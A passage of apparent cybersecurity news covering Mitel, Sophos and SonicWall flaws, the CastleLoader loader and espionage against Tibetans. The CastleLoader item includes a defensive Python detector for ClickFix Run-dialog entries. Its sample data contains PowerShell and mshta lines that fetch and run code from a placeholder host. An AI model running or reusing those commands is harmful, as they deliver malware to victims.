    The findings underscore a worrying trend involving the persistent and successful targeting of network edge devices by threat actors, particularly those from China, in recent years.

    “This campaign underscores the importance of visibility and detection within the hypervisor and infrastructure layer, where traditional endpoint security tools are ineffective,” Sygnia said.

    “Fire Ant consistently targeted infrastructure systems such as ESXi hosts, vCenter servers, and F5 load balancers. The targeted systems are rarely integrated into standard detection and response programs. These assets lack detection and response solutions and generate limited telemetry, making them ideal long-term footholds for stealthy operation.”


    Source: thehackernews.com…

  • Critical Mitel Flaw Lets Hackers Bypass Login, Gain Full Access to MiVoice MX-ONE Systems

    Jul 24, 2025 | Ravie Lakshmanan | Vulnerability / Network Security

    Mitel has released security updates to address a critical security flaw in MiVoice MX-ONE that could allow an attacker to bypass authentication protections.

    “An authentication bypass vulnerability has been identified in the Provisioning Manager component of Mitel MiVoice MX-ONE, which, if successfully exploited, could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper access control,” the company said in an advisory released Wednesday.

    “A successful exploit of this vulnerability could allow an attacker to gain unauthorized access to user or admin accounts in the system.”

    The shortcoming, which is yet to be assigned a CVE identifier, carries a CVSS score of 9.4 out of a maximum of 10.0. It affects MiVoice MX-ONE versions from 7.3 (7.3.0.0.50) to 7.8 SP1 (7.8.1.0.14).

    Patches for the issue have been made available in MXO-15711_78SP0 and MXO-15711_78SP1 for MX-ONE versions 7.8 and 7.8 SP1, respectively. Customers using MiVoice MX-ONE version 7.3 and above are recommended to submit a patch request to their authorized service partner.

    As mitigations until fixes can be applied, it’s advised to limit direct exposure of MX-ONE services to the public internet and ensure that they are placed within a trusted network.

    Along with the authentication bypass flaw, Mitel has shipped updates to resolve a high-severity vulnerability in MiCollab (CVE-2025-52914, CVSS score: 8.8) that, if successfully exploited, could permit an authenticated attacker to carry out an SQL injection attack.

    “A successful exploit could allow an attacker to access user provisioning information and execute arbitrary SQL database commands with potential impacts on the confidentiality, integrity, and availability of the system,” Mitel said.

    The vulnerability, which impacts MiCollab versions 10.0 (10.0.0.26) to 10.0 SP1 FP1 (10.0.1.101) and 9.8 SP3 (9.8.3.1) and earlier, has been resolved in versions 10.1 (10.1.0.10), 9.8 SP3 FP1 (9.8.3.103), and later.

    Given that flaws in Mitel devices have been actively exploited in the past, users should update their installations as soon as possible to mitigate potential threats.


    Source: thehackernews.com…

  • CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos and ClickFix Phishing

    Jul 24, 2025 | Ravie Lakshmanan | Malware / Cybercrime

    Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs).

    The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News.

    The malware loader, first observed in the wild earlier this year, has been used to distribute DeerStealer, RedLine, StealC, NetSupport RAT, SectopRAT, and even other loaders like Hijack Loader.

    “It employs dead code injection and packing techniques to hinder analysis,” the company said. “After unpacking itself at runtime, it connects to a C2 (command-and-control) server, downloads target modules, and executes them.”

    CastleLoader’s modular structure allows it to act as both a delivery mechanism and a staging utility, enabling threat actors to separate initial infection from payload deployment. This separation complicates attribution and response because it decouples the infection vector from the eventual malware behavior, giving attackers more flexibility in adapting campaigns over time.

    CastleLoader payloads are distributed as portable executables containing an embedded shellcode, which then invokes the main module of the loader that, in turn, connects to the C2 server in order to fetch and execute the next-stage malware.

    Attacks distributing the malware have relied on the prevalent ClickFix technique on domains posing as software development libraries, videoconferencing platforms, browser update notifications, or document verification systems, ultimately tricking users into copying and executing PowerShell commands that activate the infection chain.

    Victims are directed to the bogus domains through Google searches, at which point they are served pages containing fake error messages and CAPTCHA verification boxes developed by the threat actors, asking them to carry out a series of instructions to supposedly address the issue.
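
    ClickFix lures of the kind described above typically have the victim paste the command into the Win+R Run dialog, and Windows records each command it runs there under the RunMRU registry key (this is an assumption about the vector; the page only says the commands are copied and executed). As an added example, not PRODAFT's code, the following parses constructed reg query output for that key, restores most-recent-first order from the MRUList value, and flags entries that invoke a LOLBin together with a URL or an in-memory evaluation. The verify.example host is a placeholder.

```python
import re

# Constructed `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`
# output, not data from PRODAFT's report. Windows stores each entry with a trailing "\1".
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    b    REG_SZ    powershell -w hidden -c "iex (irm https://verify.example/captcha)"\1
    c    REG_SZ    mshta https://verify.example/v.hta\1
    MRUList    REG_SZ    cba
"""

VALUE_LINE = re.compile(r"^[ \t]+(?P<name>\S+)[ \t]+REG_SZ[ \t]+(?P<data>.*?)[ \t]*$", re.M)
# LOLBins a ClickFix paste usually invokes, combined with a fetch or in-memory eval.
SUSPICIOUS = re.compile(
    r"^(?:powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin)\b"
    r".*?(?:https?://|\b(?:iex|irm|iwr|invoke-expression|downloadstring)\b)",
    re.I | re.S)


def parse_runmru(text):
    """Return [(value_name, command)] most-recent-first, using the MRUList order."""
    values, order = {}, ""
    for m in VALUE_LINE.finditer(text):
        name, data = m.group("name"), m.group("data")
        if name == "MRUList":
            order = data
            continue
        if data.endswith("\\1"):          # strip the "\1" suffix Windows appends
            data = data[:-2]
        values[name] = data
    ordered = [(n, values[n]) for n in order if n in values]
    leftovers = [(n, v) for n, v in values.items() if n not in order]
    return ordered + leftovers


def suspicious_run_entries(text):
    """Commands typed into Win+R that fetch or evaluate remote content."""
    return [cmd for _, cmd in parse_runmru(text) if SUSPICIOUS.search(cmd.strip())]


if __name__ == "__main__":
    for cmd in suspicious_run_entries(SAMPLE_REG_QUERY):
        print("suspicious Run entry:", cmd)
```

    RunMRU is per-user and survives a reboot, so it is worth collecting in triage even when process telemetry has already rolled over; pairing the most recent entry with the PowerShell ConsoleHost_history.txt file usually recovers the full pasted command when the Run dialog only launched a short stub.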

    Alternatively, CastleLoader leverages fake GitHub repositories mimicking legitimate tools as a distribution vector, causing users who unknowingly download them to compromise their machines with malware instead.

    “This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT said.

    This strategic use of social engineering mirrors techniques employed by initial access brokers (IABs), underscoring CastleLoader's role within a broader cybercrime supply chain.

    PRODAFT said it has observed Hijack Loader being delivered via DeerStealer as well as CastleLoader, with the latter also propagating DeerStealer variants. This suggests the overlapping nature of these campaigns, despite them being orchestrated by different threat actors.

    Since May 2025, CastleLoader campaigns have leveraged seven distinct C2 servers, with 1,634 infection attempts recorded during that period. Analysis of the C2 infrastructure and its web-based panel, which is used to oversee and manage infections, shows that as many as 469 devices were compromised, an infection rate of 28.7%.

    Researchers also observed elements of anti-sandboxing and obfuscation, features typical of established loaders like SmokeLoader or IcedID. Combined with PowerShell abuse, GitHub impersonation, and dynamic unpacking, CastleLoader reflects a growing trend toward stealth-first malware loaders that operate as stagers in malware-as-a-service (MaaS) ecosystems.

    “Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said. “Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape.”

    “The C2 panel demonstrates operational capabilities typically associated with malware-as-a-service (MaaS) offerings, suggesting the operators have experience in cybercriminal infrastructure development.”


    Source: thehackernews.com…

  • Sophos and SonicWall Patch Critical RCE Flaws Affecting Firewalls and SMA 100 Devices

    Jul 24, 2025 | Ravie Lakshmanan | Network Security / Vulnerability

    Sophos and SonicWall have alerted users of critical security flaws in Sophos Firewall and Secure Mobile Access (SMA) 100 Series appliances that could be exploited to achieve remote code execution.

    The two vulnerabilities impacting Sophos Firewall are listed below –

    • CVE-2025-6704 (CVSS score: 9.8) – An arbitrary file writing vulnerability in the Secure PDF eXchange (SPX) feature can lead to pre-auth remote code execution, if a specific configuration of SPX is enabled in combination with the firewall running in High Availability (HA) mode
    • CVE-2025-7624 (CVSS score: 9.8) – An SQL injection vulnerability in the legacy (transparent) SMTP proxy can lead to remote code execution, if a quarantining policy is active for Email and SFOS was upgraded from a version older than 21.0 GA

    Sophos said CVE-2025-6704 affects about 0.05% of devices, while CVE-2025-7624 impacts as many as 0.73% of devices. Both vulnerabilities have been addressed alongside a high-severity command injection vulnerability in the WebAdmin component (CVE-2025-7382, CVSS score: 8.8) that could result in pre-auth code execution on High Availability (HA) auxiliary devices, if OTP authentication for the admin user is enabled.

    Also patched by the company are two other vulnerabilities –

    • CVE-2024-13974 (CVSS score: 8.1) – A business logic vulnerability in the Up2Date component can lead to attackers controlling the firewall’s DNS environment to achieve remote code execution
    • CVE-2024-13973 (CVSS score: 6.8) – A post-auth SQL injection vulnerability in WebAdmin can potentially lead to administrators achieving arbitrary code execution

    The U.K. National Cyber Security Centre (NCSC) has been credited with discovering and reporting both CVE-2024-13974 and CVE-2024-13973. The issues affect the following versions –

    • CVE-2024-13974 – Affects Sophos Firewall v21.0 GA (21.0.0) and older
    • CVE-2024-13973 – Affects Sophos Firewall v21.0 GA (21.0.0) and older
    • CVE-2025-6704 – Affects Sophos Firewall v21.5 GA (21.5.0) and older
    • CVE-2025-7624 – Affects Sophos Firewall v21.5 GA (21.5.0) and older
    • CVE-2025-7382 – Affects Sophos Firewall v21.5 GA (21.5.0) and older

    The disclosure comes as SonicWall detailed a critical bug in the SMA 100 Series web management interface (CVE-2025-40599, CVSS score: 9.1) that a remote attacker with administrative privileges can exploit to upload arbitrary files and potentially achieve remote code execution.

    The flaw impacts SMA 100 Series products (SMA 210, 410, 500v) and has been addressed in version 10.2.2.1-90sv.

    SonicWall also pointed out that while the vulnerability has not been exploited, there exists a potential risk in light of a recent report from the Google Threat Intelligence Group (GTIG), which found evidence of a threat actor dubbed UNC6148 leveraging fully-patched SMA 100 series devices to deploy a backdoor called OVERSTEP.

    Besides applying the fixes, the company is also recommending that customers of SMA 100 Series devices carry out the following steps –

    • Disable remote management access on the external-facing interface (X1) to reduce the attack surface
    • Reset all passwords and reinitialize OTP (One-Time Password) binding for users and administrators on the appliance
    • Enforce multi-factor authentication (MFA) for all users
    • Enable Web Application Firewall (WAF) on SMA 100

    Organizations using SMA 100 Series devices are also advised to review appliance logs and connection history for anomalies and check for any signs of unauthorized access.

    Organizations using the SMA 500v virtual product are required to back up the OVA file, export the configuration, remove the existing virtual machine and all associated virtual disks and snapshots, reinstall the new OVA from SonicWall using a hypervisor, and restore the configuration.


    Source: thehackernews.com…

  • China-Based APTs Deploy Fake Dalai Lama Apps to Spy on Tibetan Community

    Jul 24, 2025 | Ravie Lakshmanan | Cyber Espionage / Malware

    The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama’s 90th birthday on July 6, 2025.

    The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz.

    “The attackers compromised a legitimate website, redirecting users via a malicious link and ultimately installing either the Gh0st RAT or PhantomNet (aka SManager) backdoor onto victim systems,” security researchers Sudeep Singh and Roy Tay said in a Wednesday report.

    This is not the first time Chinese threat actors have resorted to watering hole attacks (aka strategic web compromises), a technique where adversaries break into websites frequently visited by a specific group to infect their devices with malware.

    Over the past two years, hacking groups like EvilBamboo, Evasive Panda, and TAG-112 have all resorted to the approach to target the Tibetan diaspora with the ultimate goal of gathering sensitive information.

    Operation GhostChat

    The latest set of attacks observed by Zscaler entails the compromise of a web page to replace the link pointing to “tibetfund[.]org/90thbirthday” with a fraudulent version (“thedalailama90.niccenter[.]net”).

    While the original web page is designed to send a message to the Dalai Lama, the replica page adds an option to send an encrypted message to the spiritual leader by downloading, from “tbelement.niccenter[.]net”, a secure chat application named TElement that claims to be a Tibetan version of Element.

    Hosted on the website is a backdoored version of the open-source encrypted chat software containing a malicious DLL that’s sideloaded to launch Gh0st RAT, a remote access trojan widely used by various Chinese hacking groups. The web page also includes JavaScript code designed to collect the visitor’s IP address and user-agent information, and exfiltrate the details to the threat actor via an HTTP POST request.

    Gh0st RAT is a fully-featured malware that supports file manipulation, screen capture, clipboard content extraction, webcam video recording, keylogging, audio recording and playback, process manipulation, and remote shell.

    Operation PhantomPrayers

    The second campaign, Operation PhantomPrayers, has been found to leverage another domain, “hhthedalailama90.niccenter[.]net,” to distribute a phony “90th Birthday Global Check-in” app (“DalaiLamaCheckin.exe,” dubbed PhantomPrayers) that, when opened, displays an interactive map and urges victims to “send your blessings” for the Dalai Lama by tapping their location on the map.

    However, the malicious functionality is stealthily triggered in the background, using DLL side-loading techniques to launch PhantomNet, a backdoor that establishes contact with a command-and-control (C2) server over TCP to receive additional plugin DLLs for execution on the compromised machine.

    “PhantomNet can be set to operate only during specific hours or days, but this capability is not enabled in the current sample,” the researchers said. “PhantomNet used modular plugin DLLs, AES-encrypted C2 traffic, and configurable timed operations, to stealthily manage compromised systems.”


    Source: thehackernews.com…